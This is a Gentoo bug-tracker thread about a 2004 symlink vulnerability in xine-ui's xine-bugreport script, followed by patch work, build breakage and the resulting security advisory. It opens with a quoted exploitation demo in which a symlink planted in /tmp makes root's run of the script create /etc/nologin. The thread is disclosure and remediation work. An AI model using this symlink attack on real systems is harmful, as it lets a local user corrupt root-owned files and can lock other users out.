Read the URL for details (http://nettwerked.mg2.org/advisories/xinebug). This got posted on bugtraq Saturday, 20/03/2004. Reproducible: Always Steps to Reproduce: In the section of the xine-bugreport/xine-check script which assembles a bug report email, a symlink vulnerability exists due to an insecure file write of the finished bug report email template. This may allow an attacker to write to/corrupt sensitive system files, and in theory elevate privileges, although unlikely. Actual Results: Exploitation ############# Below is an example exploitation scenario which I actually carried out on my system. --- attack --- [shaun@localhost shaun]$ ls -al /etc/nologin ls: /etc/nologin: No such file or directory [shaun@localhost shaun]$ ln -s /etc/nologin /tmp/xine-bugreport [...] [root@localhost bin]# xine-bugreport Please be patient, this script may take a while to run... logging to /tmp/xine-check.log... [OUCH!!] You're running me with root permissions? You should definitely run xine as normal user, not root. Running it as root will expose you to some severe security issues. This script should run as the same user that you would use to run xine. If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions... Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account. press <enter> to continue... [ good ] you're using Linux, doing specific tests [ good ] looks like you have a /proc filesystem mounted. [ good ] You seem to have a reasonable kernel version (2.4.19-16mdk) [ good ] intel compatible processor, checking MTRR support [ good ] you have MTRR support and there are some ranges set. [ good ] found the player at /usr/bin/xine [ good ] /usr/bin/xine is in your PATH [ hint ] No xine-config found. Assuming xine from RPMs The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system. However, it looks like you installed xine from the RedHat packages. So I'll just guess that you are using the standard locations. If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config. However, this package is not really needed to run xine... press <enter> to continue... [ good ] plugin directory /usr/lib/xine/plugins exists. [ good ] found input plugins [ good ] found demux plugins [ good ] found decoder plugins [ good ] found video_out plugins [ good ] found audio_out plugins [ good ] skin directory /usr/share/xine/skins exists. [ good ] found logo in /usr/share/xine/skins [ good ] I even found some skins. [ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd [ hint ] /dev/dvd is /dev/dvd, not a DVD device /dev/dvd is the default device that xine uses for playing DVDs. You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc). If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus), rm /dev/dvd ln -s hdb /dev/dvd typed as root will give you the symlink. Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case... press <enter> to continue... [ good ] found xvinfo: X-Video Extension version 2.2 [ hint ] Your X server doesn't support YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press <enter> to continue... [ hint ] Your X server doesn't support packed YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press <enter> to continue... [ hint ] Your X server doesn't have any XVideo support... XVideo is an X server extension introduced by XFree86 4.x. This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost. If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway. You will waste lots of CPU cycles, though... press <enter> to continue... Could you solve your xine problems using the previous hints? (y/n)? 'pardon?? neither yes nor no? assuming no... What kind of trouble does xine cause for you? 1) plays audio, but no video 2) plays video, but no audio 3) audio is interrupted and/or crackling 4) audio and video are out of sync 5) can't play DVDs 6) xine hangs instead of playing anything 7) xine doesn't start 8) something else [root@localhost bin]# xine-bugreport Please be patient, this script may take a while to run... logging to /tmp/xine-check.log... [OUCH!!] You're running me with root permissions? You should definitely run xine as normal user, not root. Running it as root will expose you to some severe security issues. This script should run as the same user that you would use to run xine. If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions... Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account. press <enter> to continue... [ good ] you're using Linux, doing specific tests [ good ] looks like you have a /proc filesystem mounted. [ good ] You seem to have a reasonable kernel version (2.4.19-16mdk) [ good ] intel compatible processor, checking MTRR support [ good ] you have MTRR support and there are some ranges set. [ good ] found the player at /usr/bin/xine [ good ] /usr/bin/xine is in your PATH [ hint ] No xine-config found. Assuming xine from RPMs The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system. However, it looks like you installed xine from the RedHat packages. So I'll just guess that you are using the standard locations. If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config. However, this package is not really needed to run xine... press <enter> to continue... [ good ] plugin directory /usr/lib/xine/plugins exists. [ good ] found input plugins [ good ] found demux plugins [ good ] found decoder plugins [ good ] found video_out plugins [ good ] found audio_out plugins [ good ] skin directory /usr/share/xine/skins exists. [ good ] found logo in /usr/share/xine/skins [ good ] I even found some skins. [ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd [ hint ] /dev/dvd is /dev/dvd, not a DVD device /dev/dvd is the default device that xine uses for playing DVDs. You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc). If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus), rm /dev/dvd ln -s hdb /dev/dvd typed as root will give you the symlink. Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case... press <enter> to continue... [ good ] found xvinfo: X-Video Extension version 2.2 [ hint ] Your X server doesn't support YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press <enter> to continue... [ hint ] Your X server doesn't support packed YUV overlays. That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/ press <enter> to continue... [ hint ] Your X server doesn't have any XVideo support... XVideo is an X server extension introduced by XFree86 4.x. This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost. If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway. You will waste lots of CPU cycles, though... press <enter> to continue... Could you solve your xine problems using the previous hints? (y/n)? n What kind of trouble does xine cause for you? 1) plays audio, but no video 2) plays video, but no audio 3) audio is interrupted and/or crackling 4) audio and video are out of sync 5) can't play DVDs 6) xine hangs instead of playing anything 7) xine doesn't start 8) something else please select (1..8): 8 please describe your xine problem briefly in _one_ line ( < 65 characters): hello world You should include a _complete_ copy of xine's output in your bug report. Note, however, that there is a 40K limit on messages sent to the mailing list, So you should strip down the parts that repeat over and over, if there are any. You can either copy&paste this output from the terminal where you ran xine, or you can collect xine's output in a file named /tmp/xine.out, using this command: xine >/tmp/xine.out 2>&1 (assuming you have a Bourne compatible shell, like bash, for example) If you need to add any parameters, you can do so... This method is useful if you want to remove part of the output... Which method would you prefer? 1) copy&paste 2) logfile /tmp/xine.out please select (1..2): 2 please press <return> when you have the log ready in /tmp/xine.out Hmmm, I could not read the /tmp/xine.out file. Skipping this step. You may add the output later, if this wasn't your intention... press <enter> to continue... Okay. That's all I could guide you through... I have assembled a skeleton for your bugreport in the file /tmp/xine-bugreport You're strongly encouraged to add a detailed description of your problem. Just look for 'additional description', and fill it in... When you're finished, you can use your favourite mailer to send it to <xine-user@lists.sf.net>. Please use this subject line, or something similar: Subject: bug: hello world Alternatively, I could try to send the bug report for you, using /bin/mail -s "bug: hello world" Please make sure to add the additional description before saying "yes"! Do you want me to do this now? (y/n)? n Thanks for your bugreport! Have a nice day! [...] [shaun@localhost shaun]$ ls -al /etc/nologin -rw-r--r-- 1 root root 1756 Mar 20 21:56 /etc/nologin [shaun@localhost shaun]$
I can confirm this with xine-ui 0.9.23, but for some reason I can't get to the Xine website to see if an updated version has been released.
Mhmm, I just looked at the xine website. The latest version is 1-rc3b, therefore there is apparently no fixed version available. There is now an entry in bugtraqs vulnerability db: http://www.securityfocus.com/bid/9939/info/ Except a list of vulnerable versions it doesn't seem to contain anything new.
I'm going to sleep now.. hopefully by the time I wake up one of you will have attached a patch (hint, hint)
No patch I see.. Ok how about this.. I assume this is a shell script.. with some blatant reference to /tmp.. If this is the case (shell script) could somebody please upload it so that a patch may be created. ------------------------------------------------------------------ BTW: In the future please don't open a bug with the status of GLSA. The product goes to GLSA after the bug is done being worked on in the portage system. Thanks.
Created attachment 28126 [details, diff] add symlink checks to xine-check (& xine-bugreport) This should stop xine-check/xine-bugreport blindly writing into symlinks for the logfile, tmpfile or bugreport.
Reassigning correct Product/component as the bug has not been worked out yet. -K
media-video herd -- can you review/comment and apply the patch if appropriate?
Working on it... looks like I'm the only cowboy for this herd right now. Not a good state, if you have a look at the bug list :-(
Ok, all versions in CVS now are patched. Go ahead.
Patrick: Your commit doesn't show up on CVSweb : http://www.gentoo.org/cgi-bin/viewcvs.cgi/media-video/xine-ui/?hideattic=1#dirlist Or do I have sync problems, or am I looking in the wrong package ? Thanks for your work, media-video is a large herd to watch all alone :) -K
OK I'm out of sync :) Ready for a GLSA : x86 should upgrade to xine-ui-0.9.21-r1 ppc should upgrade to xine-ui-0.9.13-r1
um .. build for xine-ui-0.9.23-r1 crashes and burns on the introduction of the patch. emerge fragment... make[3]: Nothing to be done for `all'. make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/desktops' Making all in visuals make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals' make[3]: Nothing to be done for `all'. make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals' make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc' test `cd .; pwd` = `pwd` || cp ./xine-check.sh.in . perl ./build-xine-check.pl ./xine-check.en chmod a+x xine-check ln -s xine-check xine-bugreport ln: `xine-bugreport': File exists make[3]: *** [xine-bugreport] Error 1 make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc' make[1]: *** [all-recursive] Error 1 make[1]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23' make: *** [all] Error 2 !!! ERROR: media-video/xine-ui-0.9.23-r1 failed. !!! Function src_compile, Line 43, Exitcode 2 !!! (no error message) attempt to symlink finds a real file already there .. previous version (without -r1) installed fine
*** Bug 47737 has been marked as a duplicate of this bug. ***
sorry guys, there's something work with this patch.
Hmm... going back to wait_for_ebuild phosphan: your opinion on the problem ? Someone with powers should remove the offending ebuild ?
i've also created a bug upstream http://sourceforge.net/tracker/index.php?func=detail&aid=934417&group_id=9655&atid=109655
A minor subtlety .. my previous xine-ui-0.9.23.ebuild with the true-false patch added installed fine.. Apparently some changes had occurred since I last installed (had to use the ebuild copy out of /var/db in order to test). So some thing in the symlink patch is causing the file xine-bugreport to exist too soon perhaps? It is created seemingly before xine-check according to the time stamps ..
i've just commited a fix. please test and report
*** Bug 47749 has been marked as a duplicate of this bug. ***
nope at this time it still does the same thing (ebuild time stamp 12:37 now instead of 6:33).. perhaps using a "ln -sf" would work but I don't know how to add that.. nothing seems to have changed (except a few quotes removed).. comparing the ebuilds .. perhaps it has not yet hit the mirrors??
emerge -pu world broke on xine-ui install. Come on guys, get it together. This shouldn't be happening on the stable branch. Just so I don't sound like a total ass: Gentoo is great, and so are the people who help make it happen. Except for the odd time. :o).
*** Bug 47748 has been marked as a duplicate of this bug. ***
it compiles here on both of my dev boxes
okay I can make it compile and install using the ebuild commands .. provided I clobber xine-bugreport .. ""after unpack" or rather after a failed emerge" and before compile, install and qmerge..
okay add the line rm misc/xine-bugreport as the first line inside the Braces of the src_compile routine in the ebuild and it all works ..
The src_compile alteration cured the problem for me.
*** Bug 47794 has been marked as a duplicate of this bug. ***
ack! what a pain this was... the misc/xine-bugreport is a symlink created by the makefile. This file should not have appeared in the .22 tarball. The symlink-patch tried patching both these original files. So, on .23 which properly did NOT have the -bugreport file, the patch added it before the build. So the same problem reappeared. It was a moving target. Fixing one broke the other. Both versions listed below should work, and should have this security patch properly applied. 0.9.22-r2 (x86) and 0.9.23-r1 (~x86)
um .. the line rm misc/xine-bugreport is still needed for xine-ui-0.9.23-r1 to build completely .. something about the patching process is still creating a real xine-bugreport file before the symlinking happens so it chokes if the file is not clobbered.. derk
please clean your PORTAGE_TMPDIR="/var/tmp" and try again
sorry still chokes after that. note I also tried removing the actual patching of xine-bugreport from the patch file also trying to apply the patch to only xine-check or xine-check.sh.in but any patching still results in the creation of xine-bugreport in some fashion probably by the makefile config processes. Probably any kind of date stamp alteration (atime, mtime) is setting it off.
*** Bug 47811 has been marked as a duplicate of this bug. ***
xine-ui-0.9.23-r1.ebuild,v 1.3 cvs header fixes all issues time to send out GLSA
Had this problem on two seperate computers. Both fixed by using the suggestion here: http://bugs.gentoo.org/show_bug.cgi?id=45448#c25
*** Bug 47841 has been marked as a duplicate of this bug. ***
Sorry for causing so much trouble, should've checked the side effects more thoroughly.
Two new vulnerabilities in xine-ui (#48108) and xine-lib (#48107) have just been submitted. A global GLSA will be published when all xine-* vulns will be fixed.
xine-ui-0.9.23-r2 includes the patch from #48108.
GLSA 200404-20.